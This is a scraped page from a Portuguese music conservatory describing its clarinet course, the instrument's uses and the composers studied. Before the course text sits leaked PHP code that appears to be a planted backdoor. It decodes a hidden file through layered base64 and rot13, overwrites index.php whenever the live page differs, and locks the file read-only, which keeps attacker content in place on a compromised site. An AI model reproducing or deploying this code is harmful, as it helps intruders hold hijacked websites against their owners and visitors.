$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Clarinete – Conservatório Regional do Baixo Alentejo

Clarinete

O Clarinete é um instrumento de sopro habitualmente associado em Portugal aos domínios das bandas filarmónicas, das orquestras sinfónicas, do Jazz e, por vezes, até mesmo aos domínios das músicas populares e tradicionais, como é o caso do seu uso no folclore da Nazaré. São assinaláveis as suas enormes possibilidades técnicas bem como a sua riqueza tímbrica. Através de um mecanismo que os músicos designam de boquilha com palheta simples – uma espécie de pequena lamela de cana cortada por onde o clarinetista sopra – são produzidas sonoridades quentes e vibrantes que desde os antepassados medievais deste instrumento até aos modernos instrumentos da atualidade fascinaram públicos, músicos e compositores. Na disciplina de clarinete os alunos serão introduzidos aos princípios técnicos, teóricos e estéticos deste instrumento, contactando com diversos repertórios e autores, desde a música de câmara até ao repertório sinfónico, abordando, por exemplo, obras de compositores como Carl Weber (1786 – 1826), Johannes Brahms (1833 – 1897), Franz Schubert (1797 – 1828) e Robert Schumann (1810 – 1856).